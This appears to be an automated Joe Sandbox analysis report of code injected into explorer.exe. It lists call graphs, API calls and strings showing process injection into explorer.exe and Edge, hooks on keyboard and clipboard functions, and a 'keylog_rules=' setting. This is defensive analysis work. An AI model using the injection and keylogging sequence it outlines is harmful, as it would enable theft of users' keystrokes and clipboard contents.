2fe25f1 10 API calls 882 2fe1501 CreateThread CloseHandle 880->882 881->795 882->863 883->830 884->832 886 2fe2794 885->886 887 2fe2781 MapViewOfFile 885->887 886->836 887->886 888->839 890 2fe12c5 889->890 903 2fe13a4 889->903 890->903 951 2fe29bd VirtualAlloc 890->951 892 2fe12d9 lstrlen 952 2fe2a09 GetProcessHeap RtlAllocateHeap 892->952 894 2fe29eb 3 API calls 900 2fe1375 894->900 897 2fe1329 RtlMoveMemory 955 2fe2569 897->955 898 2fe1353 RtlMoveMemory 899 2fe2569 2 API calls 898->899 905 2fe1351 899->905 906 2fe1388 PathMatchSpecA 900->906 907 2fe1399 900->907 903->840 904 2fe12f0 904->905 953 2fe2841 lstrlen lstrlen 904->953 905->894 906->900 906->907 959 2fe29ae VirtualFree 907->959 909 2fe271c 908->909 910 2fe26e7 IsWow64Process 908->910 909->840 911 2fe26f8 IsWow64Process 910->911 912 2fe270a 910->912 911->912 913 2fe2715 CloseHandle 911->913 912->913 913->909 915 2fe2724 VirtualQuery 914->915 916 2fe18d9 915->916 917 2fe18eb OpenProcess 916->917 918 2fe1b1c 916->918 917->918 919 2fe1904 917->919 918->840 920 2fe2724 VirtualQuery 919->920 921 2fe190b 920->921 921->918 922 2fe1919 NtSetInformationProcess 921->922 923 2fe1935 921->923 922->923 960 2fe1b26 923->960 926 2fe1b26 2 API calls 927 2fe197c 926->927 928 2fe1b19 CloseHandle 927->928 929 2fe1b26 2 API calls 927->929 928->918 930 2fe19a6 929->930 966 2fe1bbd 930->966 933 2fe1b26 2 API calls 934 2fe19d6 RtlMoveMemory RtlMoveMemory NtUnmapViewOfSection 933->934 935 2fe1a2b 934->935 936 2fe1af4 CreateRemoteThread 934->936 938 2fe1a31 CreateMutexA GetLastError 935->938 941 2fe1a61 GetModuleHandleA GetProcAddress ReadProcessMemory 935->941 937 2fe1b0b CloseHandle 936->937 939 2fe1b0d CloseHandle CloseHandle 937->939 938->935 940 2fe1a4d CloseHandle Sleep 938->940 939->928 940->938 942 2fe1aed 941->942 943 2fe1a92 WriteProcessMemory 941->943 942->937 942->939 943->942 944 2fe1abc CreateRemoteThread CloseHandle Sleep WriteProcessMemory 943->944 944->942 946 2fe2724 VirtualQuery 945->946 947 2fe29f3 946->947 948 2fe2a07 947->948 949 2fe29f7 GetProcessHeap HeapFree 947->949 948->840 949->948 950->834 951->892 952->904 954 2fe130c RtlZeroMemory 953->954 954->897 954->898 956 2fe2577 lstrlen RtlMoveMemory 955->956 957 2fe25a1 955->957 956->957 957->904 959->903 961 2fe1b3a 960->961 965 2fe195a 960->965 962 2fe1b4a NtCreateSection 961->962 963 2fe1b69 961->963 962->963 964 2fe1b7e NtMapViewOfSection 963->964 963->965 964->965 965->926 967 2fe1c06 966->967 968 2fe1bd4 966->968 971 2fe1c17 LoadLibraryA 967->971 973 2fe1c69 967->973 974 2fe1c47 GetProcAddress 967->974 969 2fe1bd6 RtlMoveMemory 968->969 969->967 969->969 970 2fe19b6 NtUnmapViewOfSection 970->933 971->967 971->970 972 2fe1c87 LdrProcessRelocationBlock 972->970 972->973 973->970 973->972 974->967 974->970 975->857 976->859 978 2fe27bf CryptCreateHash lstrlen CryptHashData CryptGetHashParam 977->978 979 2fe1445 CreateMutexA GetLastError 977->979 980 2fe2805 wsprintfA 978->980 979->862 979->863 980->980 981 2fe2827 CryptDestroyHash CryptReleaseContext 980->981 981->979 982->867 984 2fe2631 983->984 985 2fe2681 CloseHandle 984->985 986 2fe2671 Thread32Next 984->986 987 2fe263d OpenThread 984->987 985->871 986->984 988 2fe2658 SuspendThread 987->988 989 2fe2660 ResumeThread 987->989 990 2fe2666 CloseHandle 988->990 989->990 990->986 992 2fe1f44 991->992 1000 2fe1fad 991->1000 992->1000 1010 2fe1fea VirtualProtect 992->1010 994 2fe1f5b 994->1000 1011 2fe29bd VirtualAlloc 994->1011 996 2fe1f67 997 2fe1f84 996->997 998 2fe1f71 RtlMoveMemory 996->998 1012 2fe1fea VirtualProtect 997->1012 998->997 1000->872 1002 2fe2724 VirtualQuery 1001->1002 1003 2fe1e93 1002->1003 1004 2fe14fa 1003->1004 1013 2fe1ed8 1003->1013 1004->880 1008 2fe1eba 1008->1004 1018 2fe1fea VirtualProtect 1008->1018 1010->994 1011->996 1012->1000 1014 2fe1e9e 1013->1014 1015 2fe1eea 1013->1015 1014->1004 1017 2fe1fea VirtualProtect 1014->1017 1015->1014 1016 2fe1f04 lstrcmp 1015->1016 1016->1014 1016->1015 1017->1008 1018->1004 1136 2fe1581 1137 2fe158e 1136->1137 1138 2fe1623 1137->1138 1139 2fe15a7 GlobalLock 1137->1139 1139->1138 1140 2fe15b5 1139->1140 1141 2fe15e4 1140->1141 1142 2fe15c0 1140->1142 1157 2fe293e 1141->1157 1143 2fe15f2 1142->1143 1144 2fe15c5 lstrlenW 1142->1144 1147 2fe2724 VirtualQuery 1143->1147 1156 2fe2a09 GetProcessHeap RtlAllocateHeap 1144->1156 1149 2fe15fb 1147->1149 1148 2fe15d8 lstrcatW 1148->1143 1150 2fe15ff lstrlenW 1149->1150 1151 2fe161b GlobalUnlock 1149->1151 1150->1151 1152 2fe160a 1150->1152 1151->1138 1153 2fe16b9 19 API calls 1152->1153 1154 2fe1614 1153->1154 1155 2fe29eb 3 API calls 1154->1155 1155->1151 1156->1148 1158 2fe294d lstrlen 1157->1158 1163 2fe2982 1157->1163 1164 2fe2a09 GetProcessHeap RtlAllocateHeap 1158->1164 1160 2fe2963 MultiByteToWideChar 1161 2fe297b 1160->1161 1160->1163 1162 2fe29eb 3 API calls 1161->1162 1162->1163 1163->1143 1164->1160

                                                                                            Callgraph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            • Opacity -> Relevance
                                                                                            • Disassembly available
                                                                                            callgraph 0 Function_02FE25F1 1 Function_02FE276D 2 Function_02FE1FEA 3 Function_02FE29EB 34 Function_02FE2724 3->34 4 Function_02FE2569 5 Function_02FE1E66 17 Function_02FE1CBF 5->17 6 Function_02FE29E7 7 Function_02FE9AE0 8 Function_02FE255C 9 Function_02FE17DC 45 Function_02FE2A09 9->45 10 Function_02FE275A 11 Function_02FE1ED8 12 Function_02FE24CC 13 Function_02FE26C9 14 Function_02FE2841 15 Function_02FE293E 15->3 15->45 16 Function_02FE18BF 19 Function_02FE1BBD 16->19 31 Function_02FE1B26 16->31 16->34 18 Function_02FE29BD 20 Function_02FE243D 44 Function_02FE298A 20->44 20->45 21 Function_02FE1F3A 21->2 21->5 21->18 23 Function_02FE1FB4 21->23 22 Function_02FE16B9 22->3 22->9 32 Function_02FE1E26 23->32 24 Function_02FE1533 25 Function_02FE29AE 26 Function_02FE12AE 26->3 26->4 26->8 26->14 26->18 26->25 26->45 27 Function_02FE26AE 28 Function_02FE13AE 28->0 28->3 28->21 38 Function_02FE2799 28->38 28->45 46 Function_02FE1E89 28->46 29 Function_02FE182D 29->3 29->25 35 Function_02FE25A4 29->35 43 Function_02FE200D 29->43 29->45 30 Function_02FE162B 30->22 32->17 33 Function_02FE3627 35->45 36 Function_02FE10A5 36->1 36->3 36->10 36->13 36->14 36->16 36->26 36->27 36->34 40 Function_02FE268F 36->40 42 Function_02FE288D 36->42 36->45 37 Function_02FE20A1 37->3 37->12 37->18 37->20 41 Function_02FE240F 37->41 37->42 37->44 37->45 39 Function_02FE1016 39->1 39->3 39->10 39->13 39->14 39->16 39->26 39->27 39->28 39->34 39->36 39->40 39->42 39->45 41->14 43->3 43->37 43->45 46->2 46->11 46->34 47 Function_02FE1000 47->39 48 Function_02FE1581 48->3 48->15 48->22 48->34 48->45

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 02FE2724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,02FE29F3,-00000001,02FE128C), ref: 02FE2731
                                                                                              • Part of subcall function 02FE2A09: GetProcessHeap.KERNEL32(00000008,0000A000,02FE10BF), ref: 02FE2A0C
                                                                                              • Part of subcall function 02FE2A09: RtlAllocateHeap.NTDLL(00000000), ref: 02FE2A13
                                                                                            • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 02FE1038
                                                                                            • RtlMoveMemory.NTDLL(00000000,?,?), ref: 02FE106C
                                                                                            • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 02FE1075
                                                                                            • GetCurrentProcessId.KERNEL32(?,02FE1010), ref: 02FE107B
                                                                                            • wsprintfA.USER32 ref: 02FE10E7
                                                                                            • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 02FE1155
                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02FE1160
                                                                                            • Process32First.KERNEL32(00000000,?), ref: 02FE117F
                                                                                            • CharLowerA.USER32(?), ref: 02FE1199
                                                                                            • lstrcmpiA.KERNEL32(?,explorer.exe), ref: 02FE11B5
                                                                                            • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 02FE1212
                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 02FE126C
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02FE127F
                                                                                            • Sleep.KERNELBASE(000003E8), ref: 02FE129F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000012.00000002.4486969548.0000000002FE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FE1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_18_2_2fe1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryMove$HeapProcessProcess32lstrcmpi$AllocateCharCloseCreateCurrentFirstHandleLowerNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtualwsprintf
                                                                                            • String ID: %s%s$0-vP,v$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                                                                                            • API String ID: 3206029838-1059640896
                                                                                            • Opcode ID: 6899e6e80a8a1f0a2693913fb0da8e42710208532fc75ce8fc343020a22af9a5
                                                                                            • Instruction ID: 2650d226387b7a682c0986f4e4be0b4f08ac45e99ff20038a5b5c253daa41276
                                                                                            • Opcode Fuzzy Hash: 6899e6e80a8a1f0a2693913fb0da8e42710208532fc75ce8fc343020a22af9a5
                                                                                            • Instruction Fuzzy Hash: E851E870A403059BDF17AF71DC4897BB7AAEB44BD8B000959AB578B290EB349E058F61

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 02FE2A09: GetProcessHeap.KERNEL32(00000008,0000A000,02FE10BF), ref: 02FE2A0C
                                                                                              • Part of subcall function 02FE2A09: RtlAllocateHeap.NTDLL(00000000), ref: 02FE2A13
                                                                                            • wsprintfA.USER32 ref: 02FE10E7
                                                                                              • Part of subcall function 02FE276D: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 02FE2777
                                                                                              • Part of subcall function 02FE276D: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,02FE10FE), ref: 02FE2789
                                                                                            • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 02FE1155
                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02FE1160
                                                                                            • Process32First.KERNEL32(00000000,?), ref: 02FE117F
                                                                                            • CharLowerA.USER32(?), ref: 02FE1199
                                                                                            • lstrcmpiA.KERNEL32(?,explorer.exe), ref: 02FE11B5
                                                                                            • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 02FE1212
                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 02FE126C
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02FE127F
                                                                                            • Sleep.KERNELBASE(000003E8), ref: 02FE129F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000012.00000002.4486969548.0000000002FE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FE1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_18_2_2fe1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileHeapProcess32lstrcmpi$AllocateCharCloseCreateFirstHandleLowerMappingMemoryMoveNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
                                                                                            • String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                                                                                            • API String ID: 3018447944-2805246637
                                                                                            • Opcode ID: e04527e2bc46a1293099e0e4b22c777900fcfa4c690ac4558a7d6cff43b675fc
                                                                                            • Instruction ID: b2c8c07faba8463119750515971374a49ce6f19472abbaeeb482781e7c75cba2
                                                                                            • Opcode Fuzzy Hash: e04527e2bc46a1293099e0e4b22c777900fcfa4c690ac4558a7d6cff43b675fc
                                                                                            • Instruction Fuzzy Hash: 1441E870A443059BDF17AF658C8897BB3AAEB84BD8F000A58AF5787280EB349D058F51

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 123 2fe9ae0-2fe9ae5 124 2fe9cad 123->124 125 2fe9aeb-2fe9af8 123->125 124->124 126 2fe9b0a-2fe9b0f 125->126 127 2fe9b11 126->127 128 2fe9b13 127->128 129 2fe9b00-2fe9b05 127->129 131 2fe9b18-2fe9b1a 128->131 130 2fe9b06-2fe9b08 129->130 130->126 130->127 132 2fe9b1c-2fe9b21 131->132 133 2fe9b23-2fe9b27 131->133 132->133 133->131 134 2fe9b29 133->134 135 2fe9b2b-2fe9b32 134->135 136 2fe9b34-2fe9b39 134->136 135->131 135->136 137 2fe9b3b-2fe9b44 136->137 138 2fe9b48-2fe9b4a 136->138 141 2fe9bba-2fe9bbd 137->141 142 2fe9b46 137->142 139 2fe9b4c-2fe9b51 138->139 140 2fe9b53-2fe9b57 138->140 139->140 144 2fe9b59-2fe9b5e 140->144 145 2fe9b60-2fe9b62 140->145 143 2fe9bc2-2fe9bc5 141->143 142->138 146 2fe9bc7-2fe9bc9 143->146 144->145 147 2fe9b84-2fe9b93 145->147 148 2fe9b64 145->148 146->143 149 2fe9bcb-2fe9bce 146->149 151 2fe9ba4-2fe9bb1 147->151 152 2fe9b95-2fe9b9c 147->152 150 2fe9b65-2fe9b67 148->150 149->143 153 2fe9bd0-2fe9bec 149->153 154 2fe9b69-2fe9b6e 150->154 155 2fe9b70-2fe9b74 150->155 151->151 157 2fe9bb3-2fe9bb5 151->157 152->152 156 2fe9b9e 152->156 153->146 158 2fe9bee 153->158 154->155 155->150 159 2fe9b76 155->159 156->130 157->130 160 2fe9bf4-2fe9bf8 158->160 161 2fe9b78-2fe9b7f 159->161 162 2fe9b81 159->162 163 2fe9c3f-2fe9c42 160->163 164 2fe9bfa-2fe9c10 LoadLibraryA 160->164 161->150 161->162 162->147 166 2fe9c45-2fe9c4c 163->166 165 2fe9c11-2fe9c16 164->165 165->160 169 2fe9c18-2fe9c1a 165->169 167 2fe9c4e-2fe9c50 166->167 168 2fe9c70-2fe9ca0 VirtualProtect * 2 166->168 170 2fe9c52-2fe9c61 167->170 171 2fe9c63-2fe9c6e 167->171 172 2fe9ca4-2fe9ca8 168->172 173 2fe9c1c-2fe9c22 169->173 174 2fe9c23-2fe9c30 GetProcAddress 169->174 170->166 171->170 172->172 175 2fe9caa 172->175 173->174 176 2fe9c39-2fe9c3c 174->176 177 2fe9c32-2fe9c37 174->177 175->124 177->165
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000012.00000002.4486969548.0000000002FE8000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FE8000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_18_2_2fe8000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cc6dc2b4ac3c03095efe70bb524ecd8dca1767c69b94d729e4916ac2d291c6f7
                                                                                            • Instruction ID: c420757085c5e8a8cc7af4d2158648c80205cdd0ea31ce04c38651223964943c
                                                                                            • Opcode Fuzzy Hash: cc6dc2b4ac3c03095efe70bb524ecd8dca1767c69b94d729e4916ac2d291c6f7
                                                                                            • Instruction Fuzzy Hash: F2511AB2E442528ADF229A78CCC07A5B795EB412A4B180779C6E7CB3C6E7D45906C770

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 178 2fe276d-2fe277f OpenFileMappingA 179 2fe2794-2fe2798 178->179 180 2fe2781-2fe2791 MapViewOfFile 178->180 180->179
                                                                                            APIs
                                                                                            • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 02FE2777
                                                                                            • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,02FE10FE), ref: 02FE2789
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000012.00000002.4486969548.0000000002FE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FE1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_18_2_2fe1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$MappingOpenView
                                                                                            • String ID:
                                                                                            • API String ID: 3439327939-0
                                                                                            • Opcode ID: e49f67d12755a7458edfadebc9a8b05cea18dc58911462dbcded197822374887
                                                                                            • Instruction ID: de26668b27f133e10fb6052df0c8fb461a3b47a3fe73257efe1209141a38db70
                                                                                            • Opcode Fuzzy Hash: e49f67d12755a7458edfadebc9a8b05cea18dc58911462dbcded197822374887
                                                                                            • Instruction Fuzzy Hash: 31D0E232B45222ABEA745A7A6C0DF93AE9DDF86AE5B010025BA0DD6150E6608820C2B0

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 181 2fe275a-2fe276c UnmapViewOfFile CloseHandle
                                                                                            APIs
                                                                                            • UnmapViewOfFile.KERNEL32(00000000,?,02FE129A,00000001), ref: 02FE275E
                                                                                            • CloseHandle.KERNELBASE(?,?,02FE129A,00000001), ref: 02FE2765
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000012.00000002.4486969548.0000000002FE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FE1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_18_2_2fe1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseFileHandleUnmapView
                                                                                            • String ID:
                                                                                            • API String ID: 2381555830-0
                                                                                            • Opcode ID: 7dcc46c573bf7f6355f254b0b8a52de67d9a09e89feb16ed5ab3e5567c748ec5
                                                                                            • Instruction ID: ae363ebbedc9823e1a988253d764a2af279b34436bc65875411ec7a6ac4859b3
                                                                                            • Opcode Fuzzy Hash: 7dcc46c573bf7f6355f254b0b8a52de67d9a09e89feb16ed5ab3e5567c748ec5
                                                                                            • Instruction Fuzzy Hash: 52B01232C49034D7CB162734780C8FBBE18EE896B530509D4F30D870044724091187E8

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 182 2fe2a09-2fe2a19 GetProcessHeap RtlAllocateHeap
                                                                                            APIs
                                                                                            • GetProcessHeap.KERNEL32(00000008,0000A000,02FE10BF), ref: 02FE2A0C
                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02FE2A13
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000012.00000002.4486969548.0000000002FE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FE1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_18_2_2fe1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$AllocateProcess
                                                                                            • String ID:
                                                                                            • API String ID: 1357844191-0
                                                                                            • Opcode ID: fb1415a34d3958d793e5027c052a824717b925fbf671265c66c69407ce871ed2
                                                                                            • Instruction ID: 84eff6fc4463a8c6c4784cebe08f47a904329f95d63d9383083022cd7ad8f75a
                                                                                            • Opcode Fuzzy Hash: fb1415a34d3958d793e5027c052a824717b925fbf671265c66c69407ce871ed2
                                                                                            • Instruction Fuzzy Hash: 73A002B1E90104EBDD4557A59D0DF35B658A744F55F4049847346CA0409D7554548721

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 02FE2724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,02FE29F3,-00000001,02FE128C), ref: 02FE2731
                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000000,00000001), ref: 02FE18F4
                                                                                            • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 02FE192F
                                                                                            • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 02FE19BF
                                                                                            • RtlMoveMemory.NTDLL(00000000,02FE3638,00000016), ref: 02FE19E6
                                                                                            • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 02FE1A0E
                                                                                            • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 02FE1A1E
                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02FE1A38
                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 02FE1A40
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02FE1A4E
                                                                                            • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02FE1A55
                                                                                            • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 02FE1A6B
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02FE1A72
                                                                                            • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02FE1A88
                                                                                            • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02FE1AB2
                                                                                            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02FE1AC5
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02FE1ACC
                                                                                            • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02FE1AD3
                                                                                            • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02FE1AE7
                                                                                            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02FE1AFE
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02FE1B0B
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02FE1B11
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02FE1B17
                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 02FE1B1A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000012.00000002.4486969548.0000000002FE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FE1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_18_2_2fe1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                                                            • String ID: 0-vP,v$atan$ntdll$opera_shared_counter
                                                                                            • API String ID: 1066286714-2395699481
                                                                                            • Opcode ID: 27c7b7555079675a82f59dee5c2f69257caaa872fe7d497b70def3e4261e3c93
                                                                                            • Instruction ID: 0a3171f84ceb5419c96ccde194f24e0528f10ee9b1266ea0feccf1f44cedfbc3
                                                                                            • Opcode Fuzzy Hash: 27c7b7555079675a82f59dee5c2f69257caaa872fe7d497b70def3e4261e3c93
                                                                                            • Instruction Fuzzy Hash: 7B617271A44209AFDB12DF259C48E7BBBEDEB89798F000559FA4A97240D770DD04CB62

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 02FE27B5
                                                                                            • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 02FE27CD
                                                                                            • lstrlen.KERNEL32(?,00000000), ref: 02FE27D5
                                                                                            • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 02FE27E0
                                                                                            • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 02FE27FA
                                                                                            • wsprintfA.USER32 ref: 02FE2811
                                                                                            • CryptDestroyHash.ADVAPI32(?), ref: 02FE282A
                                                                                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 02FE2834
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000012.00000002.4486969548.0000000002FE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FE1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_18_2_2fe1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                                                            • String ID: %02X
                                                                                            • API String ID: 3341110664-436463671
                                                                                            • Opcode ID: c3ed0eccd6b8466c1ecf19ae78f3d4bb15ad1ea4f90c5d8a183c2e8025f9a412
                                                                                            • Instruction ID: 6159abdca1703dcd84d825c6163d3eb9277e8f734eadfe4b573b511b094ca956
                                                                                            • Opcode Fuzzy Hash: c3ed0eccd6b8466c1ecf19ae78f3d4bb15ad1ea4f90c5d8a183c2e8025f9a412
                                                                                            • Instruction Fuzzy Hash: 71114971D4010CFFEB129B95EC8CEBEBBBDEB48799F1048A6FA05E6140D6714E119B60
                                                                                            APIs
                                                                                            • GetKeyboardState.USER32(?), ref: 02FE1652
                                                                                            • ToUnicode.USER32(0000001B,?,?,?,00000009,00000000), ref: 02FE167A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000012.00000002.4486969548.0000000002FE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FE1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_18_2_2fe1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: KeyboardStateUnicode
                                                                                            • String ID:
                                                                                            • API String ID: 3453085656-3916222277
                                                                                            • Opcode ID: 63a9210feeb4c46a5ad8951e796ca51008915360b2e17ec5acbd841e6c097ea9
                                                                                            • Instruction ID: e2b4a47acd15365103eb2c5ca53dcbc245eb60ca9d506aaf7c5feabc52551a9a
                                                                                            • Opcode Fuzzy Hash: 63a9210feeb4c46a5ad8951e796ca51008915360b2e17ec5acbd841e6c097ea9
                                                                                            • Instruction Fuzzy Hash: DD01C4B2D002199BDF32CA12D944BFBB3BCAF45B84F08451AEA0AE6040D730DD458EA1

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • RtlZeroMemory.NTDLL(02FE5013,0000001C), ref: 02FE13C8
                                                                                            • VirtualQuery.KERNEL32(02FE13AE,?,0000001C), ref: 02FE13DA
                                                                                            • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 02FE140B
                                                                                            • GetCurrentProcessId.KERNEL32(00000004), ref: 02FE141C
                                                                                            • wsprintfA.USER32 ref: 02FE1433
                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02FE1448
                                                                                            • GetLastError.KERNEL32 ref: 02FE144E
                                                                                            • RtlInitializeCriticalSection.NTDLL(02FE582C), ref: 02FE1465
                                                                                            • Sleep.KERNEL32(000001F4), ref: 02FE1489
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,TranslateMessage), ref: 02FE14A6
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02FE14AF
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,GetClipboardData), ref: 02FE14D0
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02FE14D3
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02FE14F1
                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0000082D,00000000,00000000,00000000), ref: 02FE150D
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02FE1514
                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 02FE152A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000012.00000002.4486969548.0000000002FE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FE1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_18_2_2fe1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleModule$AddressCreateProcThread$CloseCriticalCurrentErrorExitFileInitializeLastMemoryMutexNameProcessQuerySectionSleepUserVirtualZerowsprintf
                                                                                            • String ID: %s%d%d%d$GetClipboardData$TranslateMessage$kernel32.dll$user32.dll
                                                                                            • API String ID: 3628807430-1779906909
                                                                                            • Opcode ID: 3b24c0e275dab03bd2b54d9a3d4e2697a5a086130b2d26e3786da15252ddfa91
                                                                                            • Instruction ID: 97677a0667e7b427767542d71656a57fb3ce859d2f78467a37a366b5987a63cf
                                                                                            • Opcode Fuzzy Hash: 3b24c0e275dab03bd2b54d9a3d4e2697a5a086130b2d26e3786da15252ddfa91
                                                                                            • Instruction Fuzzy Hash: E641A870E40309EBEF12AB669C1DE6B7B9DEB44BD87004859F7078B340DB75D9148BA1

                                                                                            Control-flow Graph

                                                                                            APIs
